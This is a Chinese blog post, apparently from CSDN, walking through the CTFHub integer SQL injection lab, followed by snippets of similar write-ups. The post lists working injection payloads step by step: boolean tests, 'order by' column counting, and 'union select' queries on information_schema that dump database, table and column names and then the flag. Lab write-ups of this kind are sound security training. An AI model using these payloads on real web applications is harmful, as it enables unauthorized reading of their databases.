CTFhub-sql-整数注入

已于 2023-08-22 08:46:43 修改
阅读量533 收藏
点赞数
分类专栏: CTF--SQL注入 文章标签: sql 数据库
于 2023-08-21 10:23:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ssss39/article/details/132381042
版权
文章介绍了如何通过SQL注入检测方法,如利用`version()`,`database()`,和`user()`函数,以及`unionselect`来判断是否存在注入漏洞,并借此获取数据库结构信息,包括字段数量、表名和字段内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

常用函数:version()、database()、user()

判断存在 sqli 注入

1

1 and 1=1

 1 and 1=2

因为 1=1 为真,1=2 为假,且 1=1 与 1 显示的数据一样,那么就存在 sqli 注入

查询该数据表的字段数量

一、

2

3

 1,2成功带出数据,3没有数据,所以有两个字段

 二、

1 order by 2

1 order by 3

 1 order by 2 与 1 显示的一样,1 order by 3 没有数据,所以,字段数为 2

修改参数 ID 值

1 union select 1,2

由于 1 union select 1,2 只返回第一条结果,union select 的结果没有输出,所以需要修改参数 id

值,可以 -1 ,0 随便哪个都可以

 520 union select 1,2

 520 union select 1,version()

520 union select 1,database()  #查询当前数据库信息

查询所有的数据库库名(schemata 表 储存用户创建的 所有 数据库的库名schema_name 数据库库名

520 union select  1,group_concat(schema_name)

from information_schema.schemata

查询 sqli 数据库 下的  数据表(tables 表 储存用户创建的所有数据库的库名和表名,table_name数据库的表名

520 union select 1,group_concat(table_name)

from information_schema.tables

where table_schema='sqli'

查询sqli 数据库下,flag 表中的 字段名

columns 表 存储用户创建的所有数据库的库名table_schema、表名table_name、字段名column_name

0 union select 1,group_concat(column_name)

from information_schema.columns

where table_schema='sqli' and table_name='flag'

查询 sqli 数据库中.flag字段名下的 字段内容

520 union select 1,group_concat(flag)

from sqli.flag

CTFHUB-web-SQL注入
ookami6497的博客
11-29 976
CTFHUB SQL
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1333
CTFHUB-WEB-SQL注入
ctfhub SQL 整数型注入
qq_52671379的博客
06-21 416
SQL 整数型注入 题目 当输入值为1或2时有回显 当输入3时无回显 判断是否存在注入 加单引号 对应的id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,无回显。 作为sql注入的小白,我决定不采用大佬们的方法,看不懂,先分享自己的方法,非常传统。 由以上得知有两个字段,所以第一步,爆库名; '' union select 1,database() # 第二,爆表名; '' union select 1,group_concat(table_name) from information_
ctfhub-SQL注入-SQL整数型注入
qq_46222050的博客
09-01 794
做这个题目前,建议去B站看一下SQL注入的视频,挺基础的,也有了解。 2020最新Java老王带你了解SQL注入(配套源码+笔记) 关键字/语句/函数 解释 union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多
ctfhub_SQL注入(整型注入,字符型注入,报错注入
最新发布
2401_87524087的博客
01-16 1318
eg:输入框。提示"输个1试试?",尝试输入,发现有反应,即为注入点。(根据红色编码,发现已有?id=,只用输入?id=后面的内容。(后面输入的都要一致,若字符型,找出闭合方式'',则id=1')数字从1往后(依次/用二分法),到几的时候报错/未回显数据,就有几的前一列。(先判断这个查询结果的列数,这样才能正确地拼接入侵的查询语句,像 UNION SELECT 1,2,3... (这里的数字个数要和原查询列数相同))页面只能显示一个内容,第二句内容不显示。
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2743
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHub 整数型SQL注入
Leon~博客
03-08 5780
1、整数型SQL注入 (1)判断是否存在注入 1)加单引号 URL:http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; 2)加and 1=1 URL:http:...
CTFHub-sql注入-整数型注入
qq_54537919的博客
07-22 967
CTFHub-sql注入-整数型注入
CTFHUB-WEB-SQL注入【04】整数、字符、报错注入、布尔盲注、时间盲注、cookie注入、UA注入、refer注入
(∪.∪ )...zzz的博客
06-10 405
字符型注入 1. 输入1:1被引起 1 2. ’ 提前闭合 ?id=1’ and 1=1–+ 3. 求列数 ?id=1’ order by 2–+ 4. 求数据库名 ?id=-1' union select database(),2--+ 5. 求表名 ?id=-1' union select group_concat(table_name) ,2 from information_schema.tables where table_schema='sqli' --+ 数据库名是sqli 6.
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5711
Ctfhub解题 web SQL注入
CTFHub_SQL整数型注入(超详解)
weixin_47443077的博客
07-26 1286
CTFHub_SQL整数型注入(超详解) 相信这个过程会帮助你理解sql注入! 首先打开环境 先尝试手注,已经说明是整数型,就直接查看字段数: -1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显,说明字段数是2。 接着判断显示位: -1 union select 1,2# 然后查看数据库-1 union select database(),2# 接着获取sqli数据库中的表: -1 union select 1,grou
CTFHUB-SQL注入-整数型注入
weixin_68416970的博客
06-07 711
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。使用 id=1' and 1 = 1 和 id=1' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。然后第一步先判断字段数量,然后查看数据库名,接着查看全部数据库名,查看这些数据库的表名,发现一个表名为 flag。查看这个表的全部字段后接着查看表中的数据得到此题 flag。
CTFHub~SQL注入超简单详细教程
weixin_67832625的博客
08-14 2150
本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解,让练习者对SQL注入有更详细的了解和深入,如有什么问题,随时联系作者
CTFHub技能树-SQL注入-整数型注入
m0_74313947的博客
09-15 745
思路:注入->库->表->列->数据首先使用order by探测有几列我们发现order by 2 的时候有回显,到了order by 3 的时候就没有回显了,所以列数为2然后使用联合注入得到用户名与数据库名。
CTFHub - 整数型注入
Have_a_great_day的博客
09-07 773
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHUB-SQL注入-整数型注入(一)
sev1n的博客
03-01 2419
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数型注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2890
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
ctfhubsql整数型注入
hyhyxyx的博客
07-25 365
在1后加一个’ 无回显输入id=1 and 1=1 出现回显将1=1变为1=2—》语句正确但是无法访问数据库(图三)【可判定此处有整数注入漏洞】
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

斜躺青年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值